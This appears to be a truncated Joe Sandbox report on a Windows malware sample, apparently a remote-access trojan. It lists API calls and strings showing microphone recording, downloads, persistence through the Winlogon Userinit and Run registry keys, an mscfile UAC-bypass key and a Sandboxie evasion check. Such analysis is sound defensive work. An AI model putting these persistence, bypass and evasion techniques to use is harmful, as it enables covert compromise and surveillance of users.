                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,76E50440,00415268,?,?,?,?,?,?,?,?,?,?,00408716,?), ref: 0040E6CA
                              • time.MSVCRT ref: 0040E6E2
                              • srand.MSVCRT ref: 0040E6EF
                              • rand.MSVCRT ref: 0040E703
                              • rand.MSVCRT ref: 0040E717
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00408716,?), ref: 0040E72A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00408716,?), ref: 0040E73A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00408716,?), ref: 0040E743
                              Strings
                              • abcdefghijklmnopqrstuvwxyz, xrefs: 0040E6D2
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                              • String ID: abcdefghijklmnopqrstuvwxyz
                              • API String ID: 3357298394-1277644989
                              • Opcode ID: 61b4d72e65c601405d3fc08df9816bbbc004d5cb0974ce55ff798480f3e55148
                              • Instruction ID: 1fb110d2ec9980bb9f4c5b47183564c597e57a5cf9685dcf05f4e26dd2d8a7df
                              • Opcode Fuzzy Hash: 61b4d72e65c601405d3fc08df9816bbbc004d5cb0974ce55ff798480f3e55148
                              • Instruction Fuzzy Hash: 6311CC7750011D9BCB04EBA1ED49AEF7B78EB40311F104436F901971D0DA7A9945CB68
                              Function 004026F2 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 54timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetLocalTime.KERNEL32(?,76E50440,00415A30,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040271B
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout changed to %i,?,?,0040A946,?,?), ref: 00402747
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 00402752
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040275C
                              • printf.MSVCRT ref: 00402763
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040276F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402778
                              Strings
                              • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 00402742
                              • Timeout changed to %i, xrefs: 0040273C
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                              • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Timeout changed to %i
                              • API String ID: 1710008465-867111061
                              • Opcode ID: 808450fb4774ad14a115e835dc756668e8b689d331a4670f9e89f49d9f85dff4
                              • Instruction ID: cc00f5fe8abc897b27b5181be741a8fd0fdef4b4223a36fb38de5ceb1cc1b4cc
                              • Opcode Fuzzy Hash: 808450fb4774ad14a115e835dc756668e8b689d331a4670f9e89f49d9f85dff4
                              • Instruction Fuzzy Hash: 16117B72800214BBCB509BE5DD4DEEFB7BCBB44715F144477F442A2190D6B8A584CB68
                              Function 00402791 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetLocalTime.KERNEL32(?,00415A30,?,?,?,?,?,?,?,?,?,?,?,?,004022CD,00000001), ref: 004027B2
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Disabled.,?,?,?,?), ref: 004027DD
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004022CD,00000001), ref: 004027E8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004022CD), ref: 004027F2
                              • printf.MSVCRT ref: 004027F9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402805
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040280E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                              • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Disabled.
                              • API String ID: 1710008465-2552289483
                              • Opcode ID: 3267047b5620e5403b2cf5c74a9a0aa7daad7e6dba77e29f4ce0e4a6586bfbfa
                              • Instruction ID: 26824cefd2d391b63e7f360a9efe5498c18b65437e815fb1cf45070ddafa23bd
                              • Opcode Fuzzy Hash: 3267047b5620e5403b2cf5c74a9a0aa7daad7e6dba77e29f4ce0e4a6586bfbfa
                              • Instruction Fuzzy Hash: FE11A176800218BBCF50EBE4DD0D8EE77BCAA45300B008577F842A21D1DAB89A88C779
                              Function 0040EDD3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 44COMMON
                              Download Yara Rule
                              APIs
                              • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                              • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                              • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@$??1?$basic_string@D@1@@V01@@
                              • String ID: hRA$hRA
                              • API String ID: 2647928144-3777161688
                              • Opcode ID: 70c260e072eb46f2d6d8b5b222665c27e8336ff8b799b378cd1156fa49a8c359
                              • Instruction ID: 2d0384a5b8d7644f76aacc237b36b5e03aa9b3646a5a52e53ad8478f9338e915
                              • Opcode Fuzzy Hash: 70c260e072eb46f2d6d8b5b222665c27e8336ff8b799b378cd1156fa49a8c359
                              • Instruction Fuzzy Hash: 92011A35600109ABCB04EBA8E89D8EE77B9FB84251B408179F907D7290DBB09E49CB64
                              Function 0040EED4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40COMMON
                              Download Yara Rule
                              APIs
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(?,00000000,6A41AFB0,?,?,0040E644,?), ref: 0040EEE3
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,0040E644,?), ref: 0040EF01
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,0040E644,?), ref: 0040EF09
                              • ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z.MSVCP60(00000000,00000000,?,?,0040E644,?), ref: 0040EF14
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0040E644,?), ref: 0040EF1E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF27
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0040E644,?), ref: 0040EF36
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF3F
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@D@1@@V12@
                              • String ID: D@
                              • API String ID: 3577381420-217608370
                              • Opcode ID: 64957e4059d4a5a3af3f2383b2cb762eef85518bada7f33c27665136f667c68a
                              • Instruction ID: d4362ae4465ef3a6c70cc0c136aafbc0d12dcd70d9c8d064c5fd94e1c76eb894
                              • Opcode Fuzzy Hash: 64957e4059d4a5a3af3f2383b2cb762eef85518bada7f33c27665136f667c68a
                              • Instruction Fuzzy Hash: 4E01A53550011EEFCF049F64EC9C9EA7B79FB44315B108464FC16972A0DB78AE55CB58
                              Function 00401883 Relevance: 15.1, APIs: 10, Instructions: 66COMMON
                              Download Yara Rule
                              APIs
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040188D
                              • CreateDirectoryA.KERNEL32(00000000), ref: 00401894
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 004018E2
                              • atoi.MSVCRT ref: 004018E9
                              • waveInOpen.WINMM(004151D0,000000FF,004151D8,004019AA,00000000), ref: 0040192C
                              • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 0040193F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401947
                              • waveInPrepareHeader.WINMM(00415160,00000020), ref: 00401982
                              • waveInAddBuffer.WINMM(00415160,00000020), ref: 00401991
                              • waveInStart.WINMM ref: 0040199D
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@$?resize@?$basic_string@BufferCreateDirectoryHeaderOpenPrepareStartatoi
                              • String ID:
                              • API String ID: 1105965448-0
                              • Opcode ID: 1c0ea7c4ecf195e60b421314d626c75882c3edba1827f109d9b046417a45d593
                              • Instruction ID: bf27eddb9491d6ca11d4abd4b36827af5ed132d13cec366d9f467bf0129c0db4
                              • Opcode Fuzzy Hash: 1c0ea7c4ecf195e60b421314d626c75882c3edba1827f109d9b046417a45d593
                              • Instruction Fuzzy Hash: D221E371E50A00FBC7469F65EC4CBDA7AA4FBC8315B50813AE905D62B0EBF94880CB4C
                              Function 0040E750 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103networkfileCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0040E779
                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 0040E78E
                              • InternetReadFile.WININET(?,?,00002710,?), ref: 0040E7B9
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E7CE
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E821
                              • InternetCloseHandle.WININET(?), ref: 0040E84F
                              • InternetCloseHandle.WININET(?), ref: 0040E854
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$??2@CloseHandleOpen$FileRead
                              • String ID: user
                              • API String ID: 2072504707-2375276105
                              • Opcode ID: 2ee8c07cc1f150707620ff4239a6abc9e9cbbd7c46878338fda33a680a787436
                              • Instruction ID: eb539ee71474eb75c57a488c0914650f16280e3af79cc5ff73f90012e5c67050
                              • Opcode Fuzzy Hash: 2ee8c07cc1f150707620ff4239a6abc9e9cbbd7c46878338fda33a680a787436
                              • Instruction Fuzzy Hash: 5F317932900228ABCF25DF69D885ADF7BA5FF09350F14806AF909A7290C6749A54DB94
                              Function 004042AA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 51synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • CreateEventA.KERNEL32(?,?,?,00000000,00000000,00000000,00000000), ref: 004042BF
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668,?,?,?,00000000,00000000,00000000,00000000), ref: 004042D2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,onlinelogs,00415268,?), ref: 004042F5
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404302
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00404317
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668,?,?,?,?,?,?), ref: 00404323
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000), ref: 0040432E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@0@V?$basic_string@$D@2@@std@@Hstd@@$??1?$basic_string@??4?$basic_string@??9std@@CreateEventObjectSingleV01@V10@0@V10@@Wait
                              • String ID: onlinelogs
                              • API String ID: 3814545256-2085248552
                              • Opcode ID: f8ba56530e54795d1a185f62b9b80f38ef3ca3acce3b7b9791dac6e42c8a8b2b
                              • Instruction ID: dcc0d7a04b3077ee23eca2ee736643480c7622a3ab28667727a229d9fd835d7f
                              • Opcode Fuzzy Hash: f8ba56530e54795d1a185f62b9b80f38ef3ca3acce3b7b9791dac6e42c8a8b2b
                              • Instruction Fuzzy Hash: 0601D2B1500208BFC750AB74DE49DEB7BBCFF85304B10067AF902A2691DAB89D488779
                              Function 00402B5B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63COMMON
                              Download Yara Rule
                              APIs
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415968,00000000,00415940), ref: 00402B87
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402B90
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,00000000), ref: 00402BAB
                                • Part of subcall function 00408F64: RegOpenKeyExA.ADVAPI32(80000001,00406AD4,00000000,00020019,00406AD4), ref: 00408F7E
                                • Part of subcall function 00408F64: RegQueryValueExA.ADVAPI32(00406AD4,?,00000000,00000000,?,80000001,80000001), ref: 00408F9A
                                • Part of subcall function 00408F64: RegCloseKey.ADVAPI32(00406AD4), ref: 00408FA5
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00402BD6
                                • Part of subcall function 00408FDA: RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                • Part of subcall function 00408FDA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                • Part of subcall function 00408FDA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                • Part of subcall function 00408FDA: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                • Part of subcall function 00408FDA: RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00402BF5
                                • Part of subcall function 00409132: RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00000002,80000002,?,00406E1F,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000), ref: 00409143
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?c_str@?$basic_string@$CloseOpenValue$??0?$basic_string@??1?$basic_string@?length@?$basic_string@?size@?$basic_string@CreateD@1@@Query
                              • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                              • API String ID: 1049763294-2313358711
                              • Opcode ID: 52d834ad7dbe387af31c16091ba16812ba16630a9bf9eb5042469d97c8839c8f
                              • Instruction ID: ce9100f12018cb41e6333c8ca2a80e1a56526989df9abf25ad7ef470a405d909
                              • Opcode Fuzzy Hash: 52d834ad7dbe387af31c16091ba16812ba16630a9bf9eb5042469d97c8839c8f
                              • Instruction Fuzzy Hash: 5511CA71A002547BDB0163A89C99BEF776D9B85300F0441B7F945E22C1DAB85E8647DD
                              Function 00401000 Relevance: 12.1, APIs: 8, Instructions: 92threadCOMMON
                              Download Yara Rule
                              APIs
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001C,00415978,00000000,00415940,004075A2,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401013
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040103B
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001F,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401060
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401085
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000021,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010AA
                              • CreateThread.KERNEL32(00000000,00000000,004011F8,00000000,00000000,00000000), ref: 004010C0
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000022,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010D1
                              • CreateThread.KERNEL32(00000000,00000000,00401216,00000000,00000000,00000000), ref: 004010E5
                                • Part of subcall function 004010F1: GetModuleHandleA.KERNEL32(SbieDll.dll,00401025,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010F6
                                • Part of subcall function 00401234: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000002F,00410560,00415978,00415940), ref: 00401259
                                • Part of subcall function 00401234: exit.MSVCRT ref: 00401263
                                • Part of subcall function 00401234: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000002F,0041055C,00000001,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401278
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@std@@U?$char_traits@V?$allocator@$?data@?$basic_string@D@2@@std@@$??8std@@CreateD@2@@0@ThreadV?$basic_string@$HandleModuleexit
                              • String ID:
                              • API String ID: 3827955099-0
                              • Opcode ID: 886a64f9d97f4e7677d0af7a9acbcbccb3fe7bc9225a759a474fba55b627c5cf
                              • Instruction ID: 5b21bb54b2fce72050f5962a4a3546230b449f07c752eed21346b36d0e69d07d
                              • Opcode Fuzzy Hash: 886a64f9d97f4e7677d0af7a9acbcbccb3fe7bc9225a759a474fba55b627c5cf
                              • Instruction Fuzzy Hash: EF21F12064128066EA2537B26D1EAAF1A1A4BC6705B0400FFF582BF2E2DE7D4CC1D66D
                              Function 0040F8BF Relevance: 10.6, APIs: 7, Instructions: 55windowstringCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040F8D9
                                • Part of subcall function 0040F978: RegisterClassExA.USER32(00000030), ref: 0040F9BE
                                • Part of subcall function 0040F978: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0040F9D9
                                • Part of subcall function 0040F978: GetLastError.KERNEL32(?,00000000), ref: 0040F9E3
                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0040F910
                              • lstrcpynA.KERNEL32(00415BC8,00000040), ref: 0040F928
                              • Shell_NotifyIconA.SHELL32(00000000,00415BB0), ref: 0040F93E
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040F951
                              • TranslateMessage.USER32(?), ref: 0040F95B
                              • DispatchMessageA.USER32(?), ref: 0040F965
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                              • String ID:
                              • API String ID: 1970332568-0
                              • Opcode ID: 2786fddfdab5fbc73eaeb84a67dd41f479d7273ef5a77b00e14b6c4e5329e6b6
                              • Instruction ID: 6c70321501f622e291cef7a2b269b544ec8077eec463a2dcd1f5d48526f3bc04
                              • Opcode Fuzzy Hash: 2786fddfdab5fbc73eaeb84a67dd41f479d7273ef5a77b00e14b6c4e5329e6b6
                              • Instruction Fuzzy Hash: BF111FB2806619EBD7109B91EC48EEB3B7CFB89354F008176B615E2190D7B8A545CBAC
                              Function 00408FDA Relevance: 10.5, APIs: 7, Instructions: 41registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                              • RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                              • RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040903C
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                              • String ID:
                              • API String ID: 2159132150-0
                              • Opcode ID: c96356cb78dfb9d80db60ec6b5f7434fb2546494d656b3e51b260e3425f17090
                              • Instruction ID: da37749cfa3f05033a32fbbd08786c797a634bef9566a04a8c5ae3221e21c764
                              • Opcode Fuzzy Hash: c96356cb78dfb9d80db60ec6b5f7434fb2546494d656b3e51b260e3425f17090
                              • Instruction Fuzzy Hash: DA016932000009AFCF009F90FD889EA3B69FF18355B008075F90A92060DB729D64CB58
                              Function 004084B8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39processCOMMON
                              Download Yara Rule
                              APIs
